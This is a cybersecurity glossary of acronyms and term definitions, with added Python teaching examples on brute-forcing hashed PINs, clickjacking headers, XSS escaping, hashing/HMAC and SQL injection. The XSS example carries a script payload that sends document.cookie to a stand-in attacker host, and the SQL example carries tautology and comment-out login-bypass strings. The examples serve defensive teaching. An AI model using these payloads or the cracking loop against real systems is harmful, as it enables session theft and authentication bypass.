Cyber Glossary

Acronyms

Acronym: Description

3DES: Triple Data Encryption Standard
ABAC: Attribute-Based Access Control
ACL: Access Control List
ADP: Automated Data Processing
AES: Advanced Encryption Standard
AH: Authentication Header
AIS: Automated Information System
AO: Area of Operations
ASR: Attack Surface Reduction
APT: Advanced Persistent Threat
BCP: Business Continuity Plan
BIA: Business Impact Analysis
BoD: Beginning of Day
BYOD: Bring Your Own Device
CA: Certificate Authority
CIO: Chief Information Officer
CISO: Chief Information Security Officer
CSO: Chief Security Officer
CAPEC: Common Attack Pattern Enumeration and Classification
CERT: Computer Emergency Response Team
CMMC: Cybersecurity Maturity Model Certification
CWPP: Cloud Workload Protection Platform
DES: Data Encryption Standard
DHS: Department of Homeland Security
DRP: Disaster Recovery Plan
DAC: Discretionary Access Control
DNS: Domain Name System
ECC: Elliptic Curve Cryptography
EFT: Electronic Funds Transfer
ESP: Encapsulating Security Payload
EW: Electronic Warfare
FISMA: Federal Information Security Modernization Act
FTP: File Transfer Protocol
FO: Forward Observer
GRC: Governance, Risk and Compliance
HIPAA: Health Insurance Portability and Accountability Act
HTTP: Hypertext Transfer Protocol
HTTPS: Hypertext Transfer Protocol Secure
IaaS: Infrastructure as a Service
IAM: Identity and Access Management
IANA: Internet Assigned Numbers Authority
ICMP: Internet Control Message Protocol
IDS: Intrusion Detection System
IETF: Internet Engineering Task Force
IG: Interior Guard
IP: Internet Protocol
IPS: Intrusion Prevention System
IPsec: Internet Protocol Security
IPX: Internetwork Packet Exchange
IS: Information Systems
ISO: International Organization for Standardization
ISP: Internet Service Provider
KRI: Key Risk Indicator
LAN: Local Area Network
LDAP: Lightweight Directory Access Protocol
MAC: Mandatory Access Control
MAC: Media Access Control
MAC Address: Media Access Control Address
MAN: Metropolitan Area Network
MFA: Multi-Factor Authentication
NAT: Network Address Translation
NetBIOS: Network Basic Input/Output System
NIC: Network Interface Controller or Network Interface Card
NIAP: National Information Assurance Partnership
NIST: National Institute of Standards and Technology
NNTP: Network News Transfer Protocol
OPSEC: Operations Security
OS: Operating System
OSI: Open Systems Interconnection
OWASP: Open Web Application Security Project (renamed Open Worldwide Application Security Project in 2023)
PaaS: Platform as a Service
PIN: Personal Identification Number
PKI: Public Key Infrastructure
POTS: Plain Old Telephone Service
PSTN: Public Switched Telephone Network
RA: Registration Authority
RAS: Remote Access Service
RBAC: Role-Based Access Control
ROI: Return on Investment
RPO: Recovery Point Objective
RTO: Recovery Time Objective
SaaS: Software as a Service
SCADA: Supervisory Control and Data Acquisition
SDLC: Software Development Life Cycle
SDO: Service Delivery Objectives
SecaaS: Security as a Service
SET: Secure Electronic Transaction
SET: Social-Engineer Toolkit
SFA: Single-Factor Authentication
SLA: Service Level Agreement
S/MIME: Secure/Multipurpose Internet Mail Extensions
SMTP: Simple Mail Transfer Protocol
SoD: Segregation/Separation of Duties
SoD: Start of Day
SPX: Sequenced Packet Exchange
SSH: Secure Shell
SSL: Secure Sockets Layer
TCO: Total Cost of Ownership
TCP: Transmission Control Protocol
TCP/IP: Transmission Control Protocol/Internet Protocol
TKIP: Temporal Key Integrity Protocol
TLS: Transport Layer Security
URL: Uniform Resource Locator
UDP: User Datagram Protocol
VLAN: Virtual Local Area Network
VPN: Virtual Private Network
VoIP: Voice over Internet Protocol
WAN: Wide Area Network
WPA: Wi-Fi Protected Access
WPA2: Wi-Fi Protected Access II
WEP: Wired Equivalent Privacy
WLAN: Wireless Local Area Network
XSS: Cross-Site Scripting
XDR: Extended Detection and Response
2FA: Two-Factor Authentication


Glossary

ACCESS CONTROL
The process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities.

ADVANCED PERSISTENT THREAT (APT)
An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception).

ADWARE
Software that displays unwanted advertisements on your computer. Usually a nuisance rather than a direct threat: it pops up advertising or installs unwanted toolbars, although some adware also tracks browsing activity.

AIR GAP
To physically separate or isolate a system from other systems or networks.

AUTORUN WORMS
Malicious programs introduced via removable storage (such as USB drives) and designed to spread rapidly through the Windows AutoRun feature, which launched programs automatically when media was inserted. Once running, they look for further weaknesses that let the attacker steal information, money or both.

ATTACK PATH
The steps that an adversary takes or may take to plan, prepare for, and execute an attack.

ATTACK PATTERN
Similar cyber events or behaviors that may indicate an attack has occurred or is occurring, resulting in a security violation or a potential security violation.

ATTACK SIGNATURE
A characteristic or distinctive pattern that can be searched for or that can be used in matching to previously identified attacks.

ATTACK VECTOR
The path or means by which a hacker gains access to a computer or network server in order to deliver a payload or malicious outcome. Attack vectors enable hackers to exploit system vulnerabilities, including the human element.

AUTHENTICATION
The process of verifying the identity or other attributes of an entity (user, process, or device).

AUTHORIZATION
A process of determining, by evaluating applicable access control information, whether a subject is allowed to have the specified types of access to a particular resource.

BACKDOOR
A backdoor is a tool installed after a compromise to give an attacker easier access to the compromised system around any security mechanisms that are in place.

BEHAVIOR MONITORING
Observing the activities of users, information systems and processes and measuring those activities against organizational policies and rules, baselines of normal activity, thresholds and trends.

BLACKLIST
A list of entities that are blocked or denied privileges or access (also called a deny list).

BLENDED ATTACK
A cyber attack that combines multiple attack vectors and types of malware. Such attacks can cause severe damage because no single control blocks all of their components.

BLUE TEAM
A group that defends an enterprise’s information systems when mock attackers (i.e., the Red Team) attack, typically as part of an operational exercise conducted according to rules established and monitored by a neutral group (i.e., the White Team).

BOT
A computer connected to the Internet that has been surreptitiously compromised with malicious logic to perform activities under the command and control of a remote operator.

BROWSER HIJACKER
Malware that changes your browser's settings, such as the default search engine and home page, without your consent, typically to redirect traffic to advertising or malicious sites. Settings that change on their own are the usual sign.

BRUTE FORCE ATTACK
An attack that recovers a password, PIN or cryptographic key by systematically trying every possible value (or every entry in a large wordlist) until one matches. Its feasibility depends on the size of the search space and the cost of each guess: salting and key stretching raise the cost of offline guessing, while rate limiting and account lockout stop online guessing.
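
The following is an added example, not part of the original glossary. It brute-forces a 4-digit PIN that was stored as a bare SHA-256 hash, then repeats the search against the same PIN stored with a salt and PBKDF2 key stretching, so the attacker's cost per guess (the work factor) can be counted. The PIN, salt and tiny iteration count are constructed for the demonstration; a real deployment uses a random per-user salt and an iteration count in the hundreds of thousands.

```python
import hashlib
import itertools

# Constructed scenario (not from the original page): a 4-digit PIN stored two ways,
# as an unsalted SHA-256 hash and as a salted, iterated PBKDF2-HMAC-SHA256 hash.
DEMO_SALT = bytes.fromhex("a1b2c3d4e5f60718293a4b5c6d7e8f90")  # constructed; use os.urandom(16) in practice
DEMO_ITERATIONS = 50  # kept tiny so the demo runs in milliseconds; production counts are far higher


def all_pins():
    """Every candidate in the search space, 0000 through 9999, in order."""
    for digits in itertools.product("0123456789", repeat=4):
        yield "".join(digits)


def store_unsalted(pin: str) -> str:
    """Weak storage: one fast, unsalted hash per PIN."""
    return hashlib.sha256(pin.encode()).hexdigest()


def store_stretched(pin: str, salt: bytes = DEMO_SALT, iterations: int = DEMO_ITERATIONS) -> bytes:
    """Better storage: a per-user salt plus an iterated hash (key stretching)."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, iterations)


def crack_unsalted(target_hex: str):
    """Offline brute force against the weak form. Returns (pin, attempts)."""
    attempts = 0
    for pin in all_pins():
        attempts += 1
        if hashlib.sha256(pin.encode()).hexdigest() == target_hex:
            return pin, attempts
    return None, attempts


def crack_stretched(target: bytes, salt: bytes = DEMO_SALT, iterations: int = DEMO_ITERATIONS):
    """Same search against the stretched form. Returns (pin, attempts, hmac_calls).

    Every guess now costs `iterations` HMAC computations, so the attacker's
    work factor grows linearly with the iteration count, and the salt means a
    precomputed table of PIN hashes is useless."""
    attempts = 0
    for pin in all_pins():
        attempts += 1
        if hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, iterations) == target:
            return pin, attempts, attempts * iterations
    return None, attempts, attempts * iterations


if __name__ == "__main__":
    secret_pin = "7391"  # constructed
    pin, tries = crack_unsalted(store_unsalted(secret_pin))
    print(f"unsalted SHA-256: recovered {pin} after {tries} guesses")
    pin, tries, calls = crack_stretched(store_stretched(secret_pin))
    print(f"PBKDF2 x{DEMO_ITERATIONS}: recovered {pin} after {tries} guesses costing {calls} HMAC calls")
    print("with 600000 iterations the same search would cost", tries * 600_000, "HMAC calls")
```

A four-digit space is small enough that stretching alone cannot save it; the point of the example is the multiplier, which is why short secrets such as PINs also need online controls (lockout, throttling) rather than hashing alone.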

BUG
An unexpected and relatively small defect, fault, flaw, or imperfection in an information system or device.

CHECKSUM
A value that is computed by a function that is dependent on the contents of a data object and is stored or transmitted together with the object, for the purpose of detecting changes in the data.

CIP
Critical Infrastructure Protection. Also the name of the cyber security reliability standards (NERC CIP) that the Federal Energy Regulatory Commission (FERC) directed the North American Electric Reliability Corporation (NERC) to develop for the bulk electric system.

CIPHERTEXT
Data or information in its encrypted form.

CLICKJACKING
An attack in which a legitimate site is loaded in an invisible or disguised frame on top of a decoy page, so that a victim who believes they are clicking the decoy actually clicks a control on the hidden site (for example "Confirm", "Like" or "Pay"). Sites prevent it by refusing to be framed, using the Content-Security-Policy frame-ancestors directive or the older X-Frame-Options header.
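
The following is an added example, not part of the original glossary. It audits a set of HTTP response headers for the two anti-framing controls named above and reports which one, if any, protects the page. The sample responses are constructed; the precedence rule it encodes (a frame-ancestors directive overrides X-Frame-Options when both are present) is the one browsers follow.

```python
# Constructed HTTP response headers (not from the original page), one set per site.
SAMPLE_RESPONSES = {
    "unprotected": {"Content-Type": "text/html"},
    "legacy": {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"},
    "csp": {"Content-Type": "text/html",
            "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp-partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "misconfigured": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
}


def frame_ancestors(csp: str):
    """Source list of the frame-ancestors directive, or None if the policy lacks one."""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def framing_protection(headers: dict) -> str:
    """Classify a response's anti-framing posture.

    'csp'        frame-ancestors present and limited to 'none' and/or 'self'
    'csp-allow'  frame-ancestors present but names other origins (review them)
    'xfo'        only the legacy X-Frame-Options DENY/SAMEORIGIN header
    'none'       the page can be framed by any site
    """
    lower = {k.lower(): v for k, v in headers.items()}
    sources = frame_ancestors(lower.get("content-security-policy", ""))
    if sources is not None:
        # CSP takes precedence over X-Frame-Options when both are present.
        if sources and set(sources) <= {"'none'", "'self'"}:
            return "csp"
        return "csp-allow"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "xfo"
    # ALLOW-FROM was never widely supported and is ignored by current browsers,
    # so a response carrying only that value is effectively unprotected.
    return "none"


if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        print(f"{name:14} -> {framing_protection(headers)}")
```

Run it against headers captured from your own sites; anything reported as "none" can be embedded by an attacker's page, and "csp-allow" deserves a look at which origins were granted.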

CLOUD COMPUTING
A model for enabling on-demand network access to a shared pool of configurable computing capabilities or resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.

COMPUTER (DIGITAL) FORENSICS
The processes and tools used to create a bit-by-bit copy of an electronic device (collection and acquisition) so that the evidence can be analysed and reported on. Evidence is gathered and preserved in a way that is legally defensible and does not alter the original device or data.

CONTENT SPOOFING
Content spoofing (also called content injection) exploits a web application that reflects user-supplied input into its pages without validation, so that an attacker can make fraudulent content appear to come from the legitimate site and trick users into trusting it.

CONTINUITY OF OPERATIONS PLAN
A document that sets forth procedures for the continued performance of core capabilities and critical operations during any disruption or potential disruption.

CRITICAL INFRASTRUCTURE
The systems and assets, whether physical or virtual, so vital to society that the incapacity or destruction of such may have a debilitating impact on the security, economy, public health or safety, environment, or any combination of these matters.

CROSS SITE SCRIPTING (XSS)
A web application vulnerability in which an attacker injects script into a page served by a genuine website, usually by supplying input that the site echoes back without proper output encoding. Because the browser runs the injected script with the site's origin, the attacker can steal session cookies, act as the user or alter the page. Variants include reflected, stored and DOM-based XSS.
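
The following is an added example, not part of the original glossary. It shows a server-side template that concatenates a user comment into HTML (stored XSS) next to the same template with context-appropriate HTML escaping, and a second case for an attribute value, where escaping the quote character is what stops the input from adding an event handler. The template and attacker inputs are constructed.

```python
import html

# Constructed page fragment and attacker-supplied inputs (not from the original page).
TEMPLATE = "<p>Latest comment: {comment}</p>"
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
ATTACKER_TITLE = '" onmouseover="alert(document.cookie)'


def render_unsafe(comment: str) -> str:
    """Vulnerable: the comment is concatenated into the HTML body, so a stored
    <script> runs in every visitor's browser with the site's origin."""
    return TEMPLATE.format(comment=comment)


def render_escaped(comment: str) -> str:
    """Hardened for the HTML-body context: <, >, &, ' and " become entities,
    so the browser displays the tag as text instead of executing it."""
    return TEMPLATE.format(comment=html.escape(comment, quote=True))


def link_with_title(title: str) -> str:
    """Attribute context: quote=True matters here, because an unescaped " would
    end the title attribute and let the input append an onmouseover handler."""
    return '<a href="/docs" title="{}">docs</a>'.format(html.escape(title, quote=True))


def has_live_script(fragment: str) -> bool:
    """Crude check used only by this demo: does the fragment still contain an
    unescaped <script tag or an on* event-handler attribute?"""
    low = fragment.lower()
    return "<script" in low or ' onmouseover="' in low


if __name__ == "__main__":
    print(render_unsafe(ATTACKER_COMMENT))
    print(render_escaped(ATTACKER_COMMENT))
    print(link_with_title(ATTACKER_TITLE))
```

Escaping is context-specific: the HTML-body encoder above is wrong for data placed inside a JavaScript string, a URL or a style block, each of which needs its own encoder. A Content-Security-Policy and HttpOnly session cookies limit the damage when an encoding is missed.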

CRYPTANALYSIS
The operations performed in defeating or circumventing cryptographic protection of information by applying mathematical techniques and without an initial knowledge of the key employed in providing the protection.

CSIRT
Cyber Security Incident Response Team

CYBER MUNITIONS
A technology or system whose purpose is to cause harm or destruction by altering the running state of another system without permission.

DATA BREACH
The unauthorized movement or disclosure of sensitive information to a party, usually outside the organization, that is not authorized to have or see the information.

DATA LOSS PREVENTION
A set of procedures and mechanisms to stop sensitive data from leaving a security boundary.

DATA MINING
The process or techniques used to analyze large sets of existing information to discover previously unrevealed patterns or correlations.

DENIAL OF SERVICE (DOS)
An attack that prevents or impairs the authorized use of information system resources or services.

DIGITAL FORENSICS
The processes and specialized techniques for gathering, retaining, and analyzing system-related data (digital evidence) for investigative purposes.

DIGITAL RIGHTS MANAGEMENT (DRM)
A form of access control technology to protect and manage use of digital content or devices in accordance with the content or device provider’s intentions.

DIGITAL SIGNATURE
A value computed with a cryptographic process using a private key and then appended to a data object, thereby digitally signing the data.

DISTRIBUTED DENIAL OF SERVICE (DDOS)
A denial of service technique that uses numerous systems to perform the attack simultaneously.

DMZ
Demilitarized Zone. A physical or logical subnetwork where an organization's external-facing services are exposed to an untrusted network (i.e. the Internet), keeping that traffic away from the internal network.

DOXING
The process or technique of gathering personal information on a target or subject, and building a dossier with the intent to cause harm.

DYNAMIC ATTACK SURFACE
The automated, on-the-fly changes of an information system’s characteristics to thwart actions of an adversary.

ELECTRONIC SIGNATURE
Any mark in electronic form associated with an electronic document, applied with the intent to sign the document.

EMAIL SPOOFING
Forging the header fields of an email (typically the From address) so that it appears to come from a trusted sender and the recipient is tricked into reading or acting on it. Commonly used in phishing; SPF, DKIM and DMARC let receiving mail servers detect it.

ENTERPRISE RISK MANAGEMENT
A comprehensive approach to risk management that engages people, processes, and systems across an organization to improve the quality of decision making for managing risks that may hinder an organization’s ability to achieve its objectives.

EVENT LOGS
The computer-based documentation log of all events occurring within a system.

EXFILTRATION
The unauthorized transfer of information from an information system.

EXPLOIT
A technique to breach the security of a network or information system in violation of security policy.

EXPOSURE
The condition of being unprotected, thereby allowing access to information or access to capabilities that an attacker can use to enter a system or network.

FIREWALL
A physical appliance or software designed to control inbound and/or outbound electronic access.

HASH VALUE
A numeric value resulting from applying a mathematical algorithm against a set of data such as a file.

HASHING
A process of applying a mathematical algorithm against a set of data to produce a fixed-size value (a "hash value") that represents the data. Because any change to the data changes the hash, the value can be used to check whether a file has been altered. Commonly encountered hash functions are MD5, SHA-1 and the SHA-2 family; MD5 and SHA-1 are no longer collision resistant and should not be used where an attacker could substitute data, so new designs use SHA-256 or stronger.
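
The following is an added example, not part of the original glossary; it illustrates both the CHECKSUM and HASHING entries. It computes the SHA-256 hash of a small constructed file, verifies a copy against the published value, shows how many digest bits a one-word edit flips, and then adds a keyed hash (HMAC), because a bare checksum only detects accidental change: an attacker who alters the file can simply recompute the hash. The file contents and key are constructed.

```python
import hashlib
import hmac

# Constructed sample data for the demonstration (not from the original page):
# a small configuration "file" and a one-word tampered copy of it.
ORIGINAL = b"allow_remote_admin = false\n"
TAMPERED = b"allow_remote_admin = true\n"
# Constructed shared secret for the keyed variant; real keys come from a secret store.
MAC_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")


def sha256_hex(data: bytes) -> str:
    """Hash value of the data as 64 lowercase hex characters."""
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, published_hex: str) -> bool:
    """Recompute the hash and compare it with the published one.

    hmac.compare_digest runs in constant time; a plain == on the strings can
    leak, through timing, how many leading characters matched.
    """
    return hmac.compare_digest(sha256_hex(data), published_hex.lower())


def differing_bits(a_hex: str, b_hex: str) -> int:
    """Number of the 256 digest bits that differ between two hash values."""
    return bin(int(a_hex, 16) ^ int(b_hex, 16)).count("1")


def mac_hex(key: bytes, data: bytes) -> str:
    """Keyed hash (HMAC-SHA256). Unlike a bare checksum, an attacker who
    modifies the data cannot recompute this tag without the key."""
    return hmac.new(key, data, "sha256").hexdigest()


def verify_mac(key: bytes, data: bytes, tag_hex: str) -> bool:
    return hmac.compare_digest(mac_hex(key, data), tag_hex.lower())


if __name__ == "__main__":
    published = sha256_hex(ORIGINAL)  # what a vendor would publish next to the download
    print("published SHA-256    :", published)
    print("original verifies    :", verify_checksum(ORIGINAL, published))
    print("tampered verifies    :", verify_checksum(TAMPERED, published))
    print("bits changed by edit :", differing_bits(published, sha256_hex(TAMPERED)))
    tag = mac_hex(MAC_KEY, ORIGINAL)
    print("HMAC accepts original:", verify_mac(MAC_KEY, ORIGINAL, tag))
    print("HMAC accepts tampered:", verify_mac(MAC_KEY, TAMPERED, tag))
```

For a download, publishing the hash on the same server as the file gives no protection against a compromised server; the hash must come over a separate trusted channel or be covered by a digital signature.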

IDENTITY AND ACCESS MANAGEMENT
The methods and processes used to manage subjects and their authentication and authorizations to access specific objects.

IDENTITY THEFT
Identity theft occurs when an attacker gathers a victim's personal information and uses it to impersonate them, for example to open bank accounts, obtain credit cards or carry out transactions in the victim's name.

INCIDENT
An occurrence that actually or potentially results in adverse consequences to an information system or the information that the system processes, stores, or transmits and that may require a response action to mitigate the consequences.

INCIDENT HANDLER (CYBER SECURITY)
The person assigned to lead a team of subject matter experts in cyber security and how to respond to adverse security events.

INDUSTRIAL CONTROL SYSTEM
An information system used to control industrial processes such as manufacturing, product handling, production, and distribution or to control infrastructure assets.

INSTANT MESSAGING (IM) WORM
Worms are malware capable of replicating themselves and spreading across the Internet or a compromised network. Worms that spread over instant messaging networks are called IM worms.

INSIDER ATTACK
When someone with authorized system access carries out malicious activities on a network or computer, it is known as an insider attack or insider threat. The attacker might be an employee of the targeted business, or an outsider posing as one.

INTEGRITY
The property whereby information, an information system, or a component of a system has not been modified or destroyed in an unauthorized manner.

INTRUSION DETECTION
The process and methods for analyzing information from networks and information systems to determine if a security breach or security violation has occurred.

KEYLOGGER
Software or hardware that records keystrokes and keyboard events, usually surreptitiously, to monitor the actions of an information system's user.

LIKEJACKING
Likejacking is a variant of clickjacking aimed at social network users, particularly on Facebook. Scammers share unusual or compelling posts or videos to trick users into liking or sharing them, which spreads the scam to other users.

MACRO VIRUS
A type of malicious code that attaches itself to documents and uses the macro programming capabilities of the document’s application to execute, replicate, and spread or propagate itself.

MALWARE
Software that compromises the operation of a system by performing an unauthorized function or process.

MAN-IN-THE-MIDDLE ATTACK
Abbreviated as MITM, an attack in which the attacker places themselves between two communicating parties and intercepts, records and possibly alters the traffic while relaying it, so that each party believes it is talking directly to the other.

MITIGATION
The application of one or more measures to reduce the likelihood of an unwanted occurrence and/or lessen its consequences.

MOVING TARGET DEFENSE
The presentation of a dynamic attack surface, increasing an adversary’s work factor necessary to probe, attack, or maintain presence in a cyber target.

MSSP
Managed Security Service Provider

NIST
National Institute of Standards and Technology. The 800 series (NIST 800) covers cyber and information security.

OPEN SOURCE
Denoting software whose source code is made available under a license that lets anyone use, study, modify and redistribute it, subject to the license's conditions (such as attribution or copyleft).

OPEN SOURCE INTELLIGENCE
Intelligence collected from publicly available sources

OPEN SOURCE TOOLS
Tools that are made with open source code.

OPERATIONAL EXERCISE
An action-based exercise where personnel rehearse reactions to an incident scenario, drawing on their understanding of plans and procedures, roles, and responsibilities.

PACKET CAPTURES
The process of collecting, or capturing, network packets as they are being sent and received; used in diagnosing and solving network problems.

PENETRATION TESTING (PEN TEST)
An evaluation methodology whereby assessors actively probe for vulnerabilities and attempt to circumvent the security features of a network and/or information system.

PHARMING
Pharming redirects a user to a fake website without their consent or knowledge, typically by poisoning DNS responses or tampering with the hosts file so that the legitimate domain name resolves to the attacker's server. The fake site usually looks identical to the one the user intended to visit.

PHISHING
A digital form of social engineering to deceive individuals into providing sensitive information.

POLYMORPHIC VIRUS
A polymorphic virus is a malicious program that modifies itself when it replicates. This technique enables it to evade detection by security software.

PRIVATE KEY
A cryptographic key that must be kept confidential and is used to enable the operation of an asymmetric (public key) cryptographic algorithm.

PUBLIC KEY
The publicly-disclosed component of a pair of cryptographic keys used for asymmetric cryptography.

PURPLE TEAMING
A team established to bring the red and blue teams together so that attack findings feed directly into detection and defense, making better use of an organization's expertise.

RAT (Remote Access Trojans)
A RAT is a malicious program that gives an attacker remote control of an infected system. Using it, the attacker can access and steal confidential and personal data from the machine, and often watch the screen, log keystrokes or launch further attacks.

RANSOMWARE
Ransomware is a malicious program that, after infecting a computer, does one or both of the following:
– Makes the system non-functional unless the victim agrees to pay a ransom.
– Encrypts the computer's data and demands a ransom for the key to recover it.
Many current strains also steal data first and threaten to publish it (double extortion).

RDP
Remote Desktop Protocol. A Microsoft protocol through which a desktop or server may be accessed by a remote client.

RECOVERY
The activities after an incident or event to restore essential services and operations in the short and medium term and fully restore all capabilities in the longer term.

RED TEAM
A group authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s cybersecurity posture.

REDUNDANCY
Additional or alternative systems, sub-systems, assets, or processes that maintain a degree of overall functionality in case of loss or failure of another system, sub-system, asset, or process.

RESILIENCE
The ability to adapt to changing conditions and prepare for, withstand, and rapidly recover from disruption.

RESPONSE
The activities that address the short-term, direct effects of an incident and may also support short-term recovery.

REVERSE SOCIAL ENGINEERING ATTACK
In this kind of attack, the attacker convinces a user that they have a problem and that the attacker has the solution. For instance, the attacker first creates a problem for the target, then presents themselves as the person who can fix it, with the intention of luring the victim into divulging sensitive information.

RISK MANAGEMENT
The process of identifying, analyzing, assessing, and communicating risk and accepting, avoiding, transferring or controlling it to an acceptable level considering associated costs and benefits of any actions taken.

ROAMING PROFILE
A configuration in which the user profile within the domain is stored on a server and allows authorized users to log on to any computer within a network domain and have a consistent desktop experience.

ROOTKIT
A set of software tools with administrator-level access privileges installed on an information system and designed to hide the presence of the tools, maintain the access privileges, and conceal the activities conducted by the tools.

SCRIPT KIDDIE
An unskilled or unsophisticated individual who uses ready-made hacking tools and techniques to attack networks and deface websites.

SECURITY AUTOMATION
The use of information technology in place of manual processes for cyber incident response and management.

SECURITY POLICY
A rule or set of rules that govern the acceptable use of an organization’s information and services to a level of acceptable risk and the means for protecting the organization’s information assets.

SESSION HIJACKING
Session hijacking is an attack in which the attacker takes over a user's authenticated session, typically by stealing or predicting the session token (such as a session cookie), and then acts as that user, for example to take over their online accounts.

SHOULDER SURFING
Shoulder surfing refers to spying on a user to obtain private information such as PINs, passwords and security codes, usually by looking over the person's shoulder while they use an ATM, phone or other device.

SIEM
Security Information and Event Management. Tools and processes that collect log and event data from devices and services and perform real-time and historical correlation to detect security, compliance and service-level events.

SIGNATURE
A recognizable, distinguishing pattern.

SITUATIONAL AWARENESS
Comprehending information about the current and developing security posture and risks, based on information gathered, observation and analysis, and knowledge or experience.

SMISHING
SMiShing is a type of phishing attack in which targets are sent fake or malicious SMS messages designed to steal personal information or trick them into visiting a phishing website.

SOFTWARE ASSURANCE
The level of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at any time during its lifecycle, and that the software functions in the intended manner.

SPAM
Spam is unwanted or unsolicited email sent in bulk. It is often used to distribute malware and phishing lures.

SPEARPHISHING
An email or electronic communications scam targeted towards a specific individual, organization, or business.

SPOOFING
Faking the sending address of a transmission to gain illegal or unauthorized entry into a secure system. Extended definition: the deliberate inducement of a user or resource to take incorrect action. Note: impersonating, masquerading, piggybacking and mimicking are forms of spoofing.

SPYWARE
Software that is secretly or surreptitiously installed into an information system without the knowledge of the system user or owner.

SQL Injection
An attack that exploits an application which builds database queries by concatenating untrusted input into SQL text. By supplying input that contains SQL syntax, for example in a login form, the attacker changes the meaning of the query to bypass authentication, read or modify data, or in some databases run commands. The standard fix is parameterized queries (prepared statements), with least-privilege database accounts as defense in depth.
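
The following is an added example, not part of the original glossary. It builds a constructed in-memory SQLite users table, runs a login check that splices input into the SQL text, and shows two classic payloads (a tautology and a comment that truncates the query) succeeding against it and failing against the parameterized version. Passwords are stored in clear only to keep the example short; a real system compares against a salted, stretched hash.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory database for the demonstration (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse-battery-staple')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """VULNERABLE: untrusted input is spliced into the SQL text, so quote
    characters in the input change the structure of the query."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """FIXED: placeholders. The driver passes the values separately from the
    statement, so they are only ever compared as data."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Constructed attacker inputs.
TAUTOLOGY = "' OR '1'='1"   # turns the WHERE clause into ... OR '1'='1'
COMMENT_OUT = "alice'--"     # closes the quote and comments out the password check

if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable, right password   :", login_vulnerable(db, "alice", "correct-horse-battery-staple"))
    print("vulnerable, tautology        :", login_vulnerable(db, TAUTOLOGY, TAUTOLOGY))
    print("vulnerable, comment trick    :", login_vulnerable(db, COMMENT_OUT, "anything"))
    print("parameterized, tautology     :", login_parameterized(db, TAUTOLOGY, TAUTOLOGY))
    print("parameterized, comment trick :", login_parameterized(db, COMMENT_OUT, "anything"))
    print("parameterized, right password:", login_parameterized(db, "alice", "correct-horse-battery-staple"))
```

Parameterization protects values only; table or column names taken from input must be checked against an allow list, and the database account the application uses should not have more rights than the query needs.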

TABLETOP EXERCISE
A discussion-based exercise where personnel meet in a classroom setting or breakout groups and are presented with a scenario to validate the content of plans, procedures, policies, cooperative agreements or other information for managing an incident.

TARGETED ATTACK
A targeted attack is a highly focused attack on a specific individual or organization. The attackers persistently pursue their target over a long period while trying to remain undetected.

THREAT AGENT
An individual, group, organization, or government that conducts or has the intent to conduct detrimental activities.

THREAT ASSESSMENT
The product or process of identifying or evaluating entities, actions, or occurrences, whether natural or man-made, that have or indicate the potential to harm life, information, operations, and/or property.

TICKET
In access control, data that authenticates the identity of a client or a service and, together with a temporary encryption key (a session key), forms a credential.

TOPOLOGY DIAGRAM
A schematic diagram displaying how the various elements in a network communicate with each other. A topology diagram may be physical or logical.

TRAFFIC LIGHT PROTOCOL
A set of designations employing four colors (RED, AMBER, GREEN and WHITE) used to ensure that sensitive information is shared only with the intended audience. TLP version 2.0 (2022) renames WHITE to CLEAR and adds AMBER+STRICT.

TROJAN HORSE
A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program.

URL Spoofing
A technique used by attackers to craft a URL that impersonates the address of a legitimate website, for example with a lookalike domain, a homograph character or a trusted name placed in the user-info or subdomain part of the address. The spoofed URL looks almost identical to the real one but leads to a phishing or malicious site.

VIRUS
A computer program that can replicate itself, infect a computer without permission or knowledge of the user, and then spread or propagate to another computer.

VISHING
Voice phishing where a hacker uses voice calls to trick users into divulging personal or financial information.

VULNERABILITY
A characteristic or specific weakness that renders an organization or asset (such as information or an information system) open to exploitation by a given threat or susceptible to a given hazard. Extended definition: a characteristic of location or security posture, or of design, security procedures, internal controls, or the implementation of any of these, that permits a threat or hazard to occur. Vulnerability (expressing degree of vulnerability): a qualitative or quantitative expression of the level of susceptibility to harm when a threat or hazard is realized.

WEBSITE SPOOFING
Website spoofing refers to creating a fake site that looks exactly like a trusted and popular website, in order to collect personal or financial information from users. Spoofed websites are created using legitimate logos, colors, designs, etc., to make them look realistic.
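
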